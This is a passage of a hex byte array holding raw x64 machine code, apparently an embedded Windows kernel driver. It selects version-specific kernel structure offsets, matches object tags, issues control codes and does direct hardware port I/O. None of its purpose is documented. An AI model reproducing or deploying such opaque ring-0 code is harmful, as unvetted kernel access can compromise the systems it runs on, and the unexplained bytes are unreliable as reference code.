0x8C, 0x24, 0xA8, 0x02, 0x00, 0x00, 0xFF, 0x15, 0xB6, 0x2D, 0x00, 0x00, 0x41, 0xB0, 0x01, 0x48, 0x8D, 0x94, 0x24, 0xA8, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x58, 0x02, 0x00, 0x00, 0xFF, 0x15, 0xC5, 0x2D, 0x00, 0x00, 0x4C, 0x8D, 0x8C, 0x24, 0x58, 0x01, 0x00, 0x00, 0x4C, 0x8D, 0x84, 0x24, 0x68, 0x01, 0x00, 0x00, 0xBA, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x58, 0x02, 0x00, 0x00, 0xFF, 0x15, 0x9A, 0x2D, 0x00, 0x00, 0x85, 0xC0, 0x0F, 0x88, 0x5E, 0x02, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0x58, 0x01, 0x00, 0x00, 0x41, 0x89, 0x4D, 0x00, 0x48, 0x8B, 0xC1, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x04, 0x48, 0x8B, 0x51, 0x40, 0x4C, 0x8D, 0x4A, 0x08, 0x4C, 0x89, 0x8C, 0x24, 0xE8, 0x01, 0x00, 0x00, 0x8B, 0x8C, 0x24, 0x0C, 0x01, 0x00, 0x00, 0x83, 0xF9, 0x06, 0x75, 0x0E, 0x8B, 0x84, 0x24, 0x40, 0x03, 0x00, 0x00, 0x83, 0xF8, 0x04, 0x74, 0x12, 0xEB, 0x07, 0x8B, 0x84, 0x24, 0x40, 0x03, 0x00, 0x00, 0x83, 0xF9, 0x0A, 0x75, 0x2B, 0x85, 0xC0, 0x75, 0x27, 0x44, 0x8B, 0x84, 0x24, 0x48, 0x03, 0x00, 0x00, 0x41, 0x81, 0xF8, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x1E, 0x4C, 0x8D, 0x4A, 0x10, 0x4C, 0x89, 0x8C, 0x24, 0xE8, 0x01, 0x00, 0x00, 0x4C, 0x89, 0x8C, 0x24, 0xE8, 0x01, 0x00, 0x00, 0xEB, 0x08, 0x44, 0x8B, 0x84, 0x24, 0x48, 0x03, 0x00, 0x00, 0x49, 0x8B, 0xDF, 0x48, 0x89, 0x5C, 0x24, 0x48, 0x83, 0xF9, 0x06, 0x73, 0x11, 0x48, 0x8D, 0x9A, 0xE8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x48, 0xE9, 0x97, 0x00, 0x00, 0x00, 0x83, 0xF9, 0x06, 0x75, 0x66, 0x83, 0xF8, 0x02, 0x73, 0x11, 0x48, 0x8D, 0x9A, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x48, 0xE9, 0x7C, 0x00, 0x00, 0x00, 0x83, 0xF8, 0x02, 0x75, 0x0E, 0x48, 0x8D, 0x9A, 0xA0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x48, 0xEB, 0x69, 0x83, 0xF8, 0x03, 0x75, 0x0E, 0x48, 0x8D, 0x9A, 0xB0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x48, 0xEB, 0x56, 0x83, 0xF8, 0x04, 0x75, 0x51, 0x41, 0x81, 0xF8, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x0E, 0x48, 0x8D, 0x9A, 0xC8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x48, 0xEB, 0x3A, 0x48, 0x8D, 0x9A, 0xC0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x48, 0xEB, 0x2C, 0x83, 0xF9, 0x0A, 0x75, 0x27, 0x85, 0xC0, 0x75, 0x23, 0x41, 0x81, 0xF8, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x0E, 0x48, 0x8D, 0x9A, 0xC8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x48, 0xEB, 0x0C, 0x48, 0x8D, 0x9A, 0xC0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x48, 0x48, 0x85, 0xDB, 0x0F, 0x84, 0xDF, 0x00, 0x00, 0x00, 0x49, 0x81, 0x39, 0x50, 0x47, 0x53, 0x5F, 0x0F, 0x85, 0xD2, 0x00, 0x00, 0x00, 0x49, 0x8B, 0xFF, 0x83, 0xF9, 0x06, 0x75, 0x0E, 0x83, 0xF8, 0x03, 0x75, 0x09, 0x48, 0x8B, 0x1B, 0x48, 0x83, 0xEB, 0x70, 0xEB, 0x31, 0x83, 0xF9, 0x06, 0x75, 0x05, 0x83, 0xF8, 0x04, 0x74, 0x09, 0x83, 0xF9, 0x0A, 0x75, 0x1F, 0x85, 0xC0, 0x75, 0x1B, 0x41, 0x81, 0xF8, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x09, 0x48, 0x8B, 0x1B, 0x48, 0x83, 0xEB, 0x78, 0xEB, 0x0C, 0x48, 0x8B, 0x1B, 0x48, 0x83, 0xEB, 0x70, 0xEB, 0x03, 0x48, 0x8B, 0x1B, 0x48, 0x8B, 0xCB, 0xE8, 0xA8, 0xEB, 0xFF, 0xFF, 0x3D, 0x5C, 0x5F, 0x5F, 0x5F, 0x75, 0x05, 0x48, 0x8B, 0xFB, 0xEB, 0x09, 0x48, 0x8B, 0x5B, 0x10, 0x48, 0x85, 0xDB, 0x75, 0xE3, 0x48, 0x85, 0xFF, 0x0F, 0x84, 0x96, 0x00, 0x00, 0x00, 0x41, 0x89, 0x7D, 0x08, 0x48, 0x8B, 0xC7, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x0C, 0x48, 0x8B, 0xCF, 0xE8, 0xF3, 0xEB, 0xFF, 0xFF, 0x41, 0x89, 0x45, 0x10, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x14, 0x48, 0x8B, 0x47, 0x10, 0x41, 0x89, 0x45, 0x18, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x1C, 0x48, 0x8B, 0x47, 0x18, 0x41, 0x89, 0x45, 0x20, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x24, 0x48, 0x8B, 0xCF, 0xE8, 0x2F, 0xEC, 0xFF, 0xFF, 0x41, 0x89, 0x45, 0x28, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x2C, 0x48, 0x8B, 0xCF, 0xE8, 0x2B, 0xEB, 0xFF, 0xFF, 0x41, 0x89, 0x45, 0x30, 0xEB, 0x31, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x30, 0x41, 0x89, 0x75, 0x2C, 0x41, 0x89, 0x75, 0x28, 0x41, 0x89, 0x75, 0x24, 0x41, 0x89, 0x75, 0x20, 0x41, 0x89, 0x75, 0x1C, 0x41, 0x89, 0x75, 0x18, 0x41, 0x89, 0x75, 0x14, 0x41, 0x89, 0x75, 0x10, 0x41, 0x89, 0x75, 0x0C, 0x41, 0x89, 0x75, 0x08, 0x48, 0x8B, 0x8C, 0x24, 0x68, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x66, 0x2B, 0x00, 0x00, 0xEB, 0x39, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x28, 0x41, 0x89, 0x75, 0x2C, 0x41, 0x89, 0x75, 0x28, 0x41, 0x89, 0x75, 0x24, 0x41, 0x89, 0x75, 0x20, 0x41, 0x89, 0x75, 0x1C, 0x41, 0x89, 0x75, 0x18, 0x41, 0x89, 0x75, 0x14, 0x41, 0x89, 0x75, 0x10, 0x41, 0x89, 0x75, 0x0C, 0x41, 0x89, 0x75, 0x08, 0x41, 0x89, 0x75, 0x04, 0x41, 0x89, 0x75, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x58, 0x02, 0x00, 0x00, 0xFF, 0x15, 0xE5, 0x2A, 0x00, 0x00, 0x49, 0xC7, 0x46, 0x38, 0x34, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xD5, 0x1C, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xC4, 0x1C, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x2C, 0x0F, 0x82, 0x36, 0x01, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x0C, 0x0F, 0x82, 0x2C, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x04, 0x48, 0xC1, 0xE0, 0x20, 0x41, 0x8B, 0x4D, 0x00, 0x48, 0x03, 0xC8, 0x41, 0x8B, 0x45, 0x08, 0x0F, 0x84, 0xC3, 0x00, 0x00, 0x00, 0x49, 0x8B, 0xDF, 0x83, 0xE8, 0x01, 0x74, 0x1A, 0x83, 0xE8, 0x01, 0x74, 0x0F, 0x83, 0xF8, 0x01, 0x75, 0x14, 0xE8, 0xA9, 0xEA, 0xFF, 0xFF, 0x48, 0x8B, 0xD8, 0xEB, 0x0A, 0x48, 0x8B, 0x59, 0x18, 0xEB, 0x04, 0x48, 0x8B, 0x59, 0x10, 0x48, 0x85, 0xDB, 0x74, 0x65, 0x41, 0x89, 0x5D, 0x00, 0x48, 0x8B, 0xC3, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x04, 0x48, 0x8B, 0xCB, 0xE8, 0x7E, 0xEA, 0xFF, 0xFF, 0x41, 0x89, 0x45, 0x08, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x0C, 0x48, 0x8B, 0x43, 0x10, 0x41, 0x89, 0x45, 0x10, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x14, 0x48, 0x8B, 0x43, 0x18, 0x41, 0x89, 0x45, 0x18, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x1C, 0x48, 0x8B, 0xCB, 0xE8, 0xBA, 0xEA, 0xFF, 0xFF, 0x41, 0x89, 0x45, 0x20, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x24, 0x48, 0x8B, 0xCB, 0xE8, 0xB6, 0xE9, 0xFF, 0xFF, 0x41, 0x89, 0x45, 0x28, 0xEB, 0x64, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x28, 0x41, 0x89, 0x75, 0x24, 0x41, 0x89, 0x75, 0x20, 0x41, 0x89, 0x75, 0x1C, 0x41, 0x89, 0x75, 0x18, 0x41, 0x89, 0x75, 0x14, 0x41, 0x89, 0x75, 0x10, 0x41, 0x89, 0x75, 0x0C, 0x41, 0x89, 0x75, 0x08, 0x41, 0x89, 0x75, 0x04, 0x41, 0x89, 0x75, 0x00, 0xEB, 0x31, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x28, 0x41, 0x89, 0x75, 0x24, 0x41, 0x89, 0x75, 0x20, 0x41, 0x89, 0x75, 0x1C, 0x41, 0x89, 0x75, 0x18, 0x41, 0x89, 0x75, 0x14, 0x41, 0x89, 0x75, 0x10, 0x41, 0x89, 0x75, 0x0C, 0x41, 0x89, 0x75, 0x08, 0x41, 0x89, 0x75, 0x04, 0x41, 0x89, 0x75, 0x00, 0x49, 0xC7, 0x46, 0x38, 0x2C, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x84, 0x1B, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x73, 0x1B, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0xC9, 0x02, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x1C, 0x0F, 0x82, 0xBF, 0x02, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x4C, 0x8D, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x94, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x57, 0x29, 0x00, 0x00, 0x41, 0x8B, 0x75, 0x04, 0x48, 0xC1, 0xE6, 0x20, 0x41, 0x8B, 0x45, 0x00, 0x48, 0x03, 0xF0, 0x45, 0x8B, 0x45, 0x0C, 0x49, 0xC1, 0xE0, 0x20, 0x41, 0x8B, 0x45, 0x08, 0x4C, 0x03, 0xC0, 0x41, 0x8B, 0x7D, 0x10, 0x48, 0xC1, 0xE7, 0x20, 0x41, 0x8B, 0x45, 0x14, 0x48, 0x03, 0xF8, 0x48, 0x89, 0xBC, 0x24, 0x30, 0x03, 0x00, 0x00, 0x45, 0x8B, 0x7D, 0x18, 0x4D, 0x85, 0xC0, 0x0F, 0x84, 0x2C, 0x02, 0x00, 0x00, 0x4D, 0x8B, 0x58, 0x10, 0x4D, 0x85, 0xDB, 0x0F, 0x84, 0x1F, 0x02, 0x00, 0x00, 0x48, 0x8B, 0x4E, 0x40, 0x4C, 0x8D, 0x51, 0x08, 0x4C, 0x89, 0x94, 0x24, 0xB8, 0x01, 0x00, 0x00, 0x8B, 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x83, 0xFA, 0x06, 0x75, 0x0E, 0x8B, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x83, 0xF8, 0x04, 0x74, 0x12, 0xEB, 0x07, 0x8B, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x83, 0xFA, 0x0A, 0x75, 0x2B, 0x85, 0xC0, 0x75, 0x27, 0x44, 0x8B, 0x8C, 0x24, 0x98, 0x00, 0x00, 0x00, 0x41, 0x81, 0xF9, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x1E, 0x4C, 0x8D, 0x51, 0x10, 0x4C, 0x89, 0x94, 0x24, 0xB8, 0x01, 0x00, 0x00, 0x4C, 0x89, 0x94, 0x24, 0xB8, 0x01, 0x00, 0x00, 0xEB, 0x08, 0x44, 0x8B, 0x8C, 0x24, 0x98, 0x00, 0x00, 0x00, 0x33, 0xDB, 0x48, 0x89, 0x5C, 0x24, 0x58, 0x83, 0xFA, 0x06, 0x73, 0x11, 0x48, 0x8D, 0x99, 0xE8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x58, 0xE9, 0x97, 0x00, 0x00, 0x00, 0x83, 0xFA, 0x06, 0x75, 0x66, 0x83, 0xF8, 0x02, 0x73, 0x11, 0x48, 0x8D, 0x99, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x58, 0xE9, 0x7C, 0x00, 0x00, 0x00, 0x83, 0xF8, 0x02, 0x75, 0x0E, 0x48, 0x8D, 0x99, 0xA0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x58, 0xEB, 0x69, 0x83, 0xF8, 0x03, 0x75, 0x0E, 0x48, 0x8D, 0x99, 0xB0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x58, 0xEB, 0x56, 0x83, 0xF8, 0x04, 0x75, 0x51, 0x41, 0x81, 0xF9, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x0E, 0x48, 0x8D, 0x99, 0xC8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x58, 0xEB, 0x3A, 0x48, 0x8D, 0x99, 0xC0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x58, 0xEB, 0x2C, 0x83, 0xFA, 0x0A, 0x75, 0x27, 0x85, 0xC0, 0x75, 0x23, 0x41, 0x81, 0xF9, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x0E, 0x48, 0x8D, 0x99, 0xC8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x58, 0xEB, 0x0C, 0x48, 0x8D, 0x99, 0xC0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x58, 0x48, 0x85, 0xDB, 0x0F, 0x84, 0xEA, 0x00, 0x00, 0x00, 0x49, 0x81, 0x3A, 0x50, 0x47, 0x53, 0x5F, 0x0F, 0x85, 0xDD, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x23, 0x83, 0xFA, 0x06, 0x75, 0x0E, 0x83, 0xF8, 0x03, 0x75, 0x09, 0x49, 0x8D, 0x43, 0x70, 0x48, 0x89, 0x03, 0xEB, 0x31, 0x83, 0xFA, 0x06, 0x75, 0x05, 0x83, 0xF8, 0x04, 0x74, 0x09, 0x83, 0xFA, 0x0A, 0x75, 0x1F, 0x85, 0xC0, 0x75, 0x1B, 0x41, 0x81, 0xF9, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x09, 0x49, 0x8D, 0x43, 0x78, 0x48, 0x89, 0x03, 0xEB, 0x0C, 0x49, 0x8D, 0x43, 0x70, 0x48, 0x89, 0x03, 0xEB, 0x03, 0x4C, 0x89, 0x1B, 0xC7, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0x41, 0x65, 0x69, 0x42, 0x49, 0x8B, 0xC8, 0xE8, 0x0B, 0xE7, 0xFF, 0xFF, 0x89, 0x84, 0x24, 0x3C, 0x01, 0x00, 0x00, 0xC7, 0x07, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x14, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x20, 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0xBA, 0x04, 0xC0, 0x32, 0x00, 0x48, 0x8B, 0xCE, 0xE8, 0x46, 0xE9, 0xFF, 0xFF, 0x89, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x3D, 0x05, 0x00, 0x00, 0x80, 0x75, 0x33, 0x8B, 0x4F, 0x04, 0x41, 0x3B, 0xCF, 0x73, 0x2B, 0x89, 0x4C, 0x24, 0x28, 0x48, 0x89, 0x7C, 0x24, 0x20, 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0xBA, 0x04, 0xC0, 0x32, 0x00, 0x48, 0x8B, 0xCE, 0xE8, 0x0C, 0xE9, 0xFF, 0xFF, 0x89, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x41, 0x89, 0x45, 0x00, 0x41, 0x89, 0x7D, 0x04, 0x4C, 0x89, 0x23, 0xEB, 0x1C, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x04, 0x41, 0x89, 0x75, 0x00, 0xEB, 0x0D, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x04, 0x41, 0x89, 0x75, 0x00, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x41, 0xC7, 0x46, 0x30, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xA0, 0x18, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x8F, 0x18, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x04, 0x73, 0x11, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x78, 0x18, 0x00, 0x00, 0x41, 0xC7, 0x45, 0x00, 0x41, 0x01, 0x00, 0x00, 0xBE, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0x76, 0x38, 0x45, 0x89, 0x7E, 0x30, 0xE9, 0x5E, 0x18, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x10, 0x0F, 0x82, 0x93, 0x01, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x0C, 0x0F, 0x82, 0x89, 0x01, 0x00, 0x00, 0x45, 0x8B, 0x7D, 0x00, 0x44, 0x89, 0xBC, 0x24, 0x30, 0x03, 0x00, 0x00, 0x41, 0x0F, 0xB6, 0x45, 0x08, 0x88, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x33, 0xC0, 0x8B, 0xC8, 0x89, 0x44, 0x24, 0x44, 0x88, 0x44, 0x24, 0x30, 0xBE, 0xE8, 0x03, 0x00, 0x00, 0x44, 0x8B, 0xE0, 0x89, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x60, 0x41, 0x0F, 0xB6, 0x7D, 0x04, 0x40, 0x02, 0xFF, 0x40, 0x80, 0xCF, 0x01, 0x8B, 0xDE, 0x89, 0x5C, 0x24, 0x7C, 0x41, 0x0F, 0xB7, 0xD7, 0xEC, 0xA8, 0x40, 0x74, 0x37, 0x90, 0x83, 0xEB, 0x01, 0x89, 0x5C, 0x24, 0x7C, 0x79, 0x16, 0x44, 0x0F, 0xB6, 0xE0, 0x44, 0x89, 0xA4, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x44, 0x8B, 0x44, 0x24, 0x60, 0xE9, 0xD7, 0x00, 0x00, 0x00, 0xB9, 0x0A, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x76, 0x25, 0x00, 0x00, 0x41, 0x0F, 0xB7, 0xD7, 0xEC, 0xA8, 0x40, 0x41, 0x8B, 0xCC, 0x75, 0xCA, 0x41, 0x0F, 0xB7, 0xD7, 0xB0, 0xBF, 0xEE, 0x41, 0x8D, 0x57, 0x04, 0x40, 0x0F, 0xB6, 0xC7, 0xEE, 0x41, 0x8D, 0x57, 0x03, 0x0F, 0xB6, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0xEE, 0x41, 0x8D, 0x7F, 0x02, 0x0F, 0xB7, 0xD7, 0xEC, 0x0F, 0xB6, 0xD8, 0x80, 0xE3, 0xA8, 0x80, 0xCB, 0x08, 0x0F, 0xB6, 0xC3, 0xEE, 0xB9, 0x05, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x2D, 0x25, 0x00, 0x00, 0x80, 0xCB, 0x40, 0x0F, 0xB7, 0xD7, 0x0F, 0xB6, 0xC3, 0xEE, 0xB9, 0x64, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x18, 0x25, 0x00, 0x00, 0x89, 0x74, 0x24, 0x7C, 0x41, 0x0F, 0xB7, 0xD7, 0xEC, 0xA8, 0x01, 0x74, 0x32, 0xB9, 0x0A, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x00, 0x25, 0x00, 0x00, 0x83, 0xEE, 0x01, 0x89, 0x74, 0x24, 0x7C, 0x79, 0x17, 0x41, 0xBC, 0xEE, 0x00, 0x00, 0x00, 0x44, 0x89, 0xA4, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x8B, 0x4C, 0x24, 0x44, 0x44, 0x8B, 0xC1, 0xEB, 0x36, 0x41, 0x0F, 0xB7, 0xD7, 0xEC, 0xEB, 0xCA, 0x44, 0x0F, 0xB6, 0xC0, 0x44, 0x89, 0x44, 0x24, 0x60, 0xA8, 0x04, 0x75, 0x1C, 0xA8, 0x08, 0x75, 0x18, 0xA8, 0x10, 0x75, 0x14, 0xB9, 0x01, 0x00, 0x00, 0x00, 0x89, 0x4C, 0x24, 0x44, 0x41, 0x8D, 0x57, 0x05, 0xEC, 0x88, 0x44, 0x24, 0x30, 0xEB, 0x06, 0x33, 0xC9, 0x89, 0x4C, 0x24, 0x44, 0x41, 0x0F, 0xB7, 0xD7, 0xEC, 0x0C, 0x44, 0xEE, 0x41, 0x89, 0x4D, 0x00, 0x0F, 0xB6, 0x44, 0x24, 0x30, 0x41, 0x89, 0x45, 0x04, 0x45, 0x89, 0x65, 0x08, 0x45, 0x89, 0x45, 0x0C, 0x49, 0xC7, 0x46, 0x38, 0x10, 0x00, 0x00, 0x00, 0x41, 0xC7, 0x46, 0x30, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xC1, 0x16, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xB0, 0x16, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x10, 0x0F, 0x82, 0xAE, 0x02, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x14, 0x0F, 0x82, 0xA4, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x41, 0x8B, 0x4D, 0x04, 0x89, 0x8C, 0x24, 0x40, 0x03, 0x00, 0x00, 0x41, 0x8B, 0x5D, 0x08, 0x45, 0x8B, 0x65, 0x0C, 0x41, 0x8B, 0x75, 0x10, 0x8D, 0x79, 0x08, 0x44, 0x8B, 0xF8, 0x41, 0xC1, 0xEF, 0x08, 0x41, 0x83, 0xE7, 0x07, 0x8B, 0xD0, 0xC1, 0xEA, 0x0B, 0x83, 0xE2, 0x1F, 0x89, 0x94, 0x24, 0x48, 0x03, 0x00, 0x00, 0xC1, 0xE8, 0x10, 0x0F, 0xB6, 0xC0, 0x89, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x44, 0x8B, 0xCF, 0x45, 0x8B, 0xC7, 0x8B, 0xC8, 0xE8, 0xC6, 0xE5, 0xFF, 0xFF, 0xC1, 0xE3, 0x1C, 0x8B, 0xCB, 0x0F, 0xB6, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x48, 0x0B, 0xC8, 0x48, 0x0F, 0xBA, 0xE9, 0x1B, 0x48, 0x89, 0x8C, 0x24, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x44, 0x8B, 0xCF, 0x45, 0x8B, 0xC7, 0x8B, 0xBC, 0x24, 0x48, 0x03, 0x00, 0x00, 0x8B, 0xD7, 0x8B, 0x8C, 0x24, 0x30, 0x03, 0x00, 0x00, 0xE8, 0xC9, 0xE5, 0xFF, 0xFF, 0x41, 0x83, 0xE4, 0x07, 0x41, 0x83, 0xCC, 0x80, 0x41, 0xC1, 0xE4, 0x08, 0x44, 0x0B, 0xE6, 0x41, 0xC1, 0xE4, 0x10, 0x41, 0x8B, 0xC4, 0x48, 0x89, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x44, 0x8B, 0xA4, 0x24, 0x40, 0x03, 0x00, 0x00, 0x45, 0x8D, 0x4C, 0x24, 0x04, 0x48, 0x89, 0x44, 0x24, 0x20, 0x45, 0x8B, 0xC7, 0x8B, 0xD7, 0x8B, 0xB4, 0x24, 0x30, 0x03, 0x00, 0x00, 0x8B, 0xCE, 0xE8, 0x86, 0xE5, 0xFF, 0xFF, 0xBB, 0xA0, 0x86, 0x01, 0x00, 0x89, 0x5C, 0x24, 0x38, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x00, 0x00, 0x00, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x85, 0xDB, 0x78, 0x3A, 0x48, 0x8D, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x45, 0x8B, 0xCC, 0x45, 0x8B, 0xC7, 0x8B, 0xD7, 0x8B, 0xCE, 0xE8, 0x10, 0xE5, 0xFF, 0xFF, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x00, 0x00, 0x00, 0x0F, 0xBA, 0xE1, 0x1C, 0x72, 0x08, 0xF7, 0xC1, 0x00, 0x00, 0x00, 0xA0, 0x75, 0x08, 0xFF, 0xCB, 0x89, 0x5C, 0x24, 0x38, 0xEB, 0xC2, 0x8B, 0xC1, 0x25, 0x00, 0x00, 0x00, 0xA0, 0x3D, 0x00, 0x00, 0x00, 0x80, 0x0F, 0x84, 0x04, 0x01, 0x00, 0x00, 0xBE, 0xE8, 0x03, 0x00, 0x00, 0x44, 0x8B, 0xE6, 0x89, 0x74, 0x24, 0x38, 0x8B, 0x9C, 0x24, 0x30, 0x03, 0x00, 0x00, 0x45, 0x85, 0xE4, 0x0F, 0x88, 0xA1, 0x00, 0x00, 0x00, 0x8B, 0x9C, 0x24, 0x40, 0x03, 0x00, 0x00, 0x48, 0x8D, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x44, 0x8D, 0x4B, 0x08, 0x45, 0x8B, 0xC7, 0x8B, 0xD7, 0x8B, 0x8C, 0x24, 0x30, 0x03, 0x00, 0x00, 0xE8, 0x9B, 0xE4, 0xFF, 0xFF, 0x4C, 0x8B, 0x9C, 0x24, 0x90, 0x00, 0x00, 0x00, 0x49, 0x0F, 0xBA, 0xFB, 0x1B, 0x4C, 0x89, 0x9C, 0x24, 0x90, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x5C, 0x24, 0x20, 0x44, 0x8D, 0x4B, 0x08, 0x45, 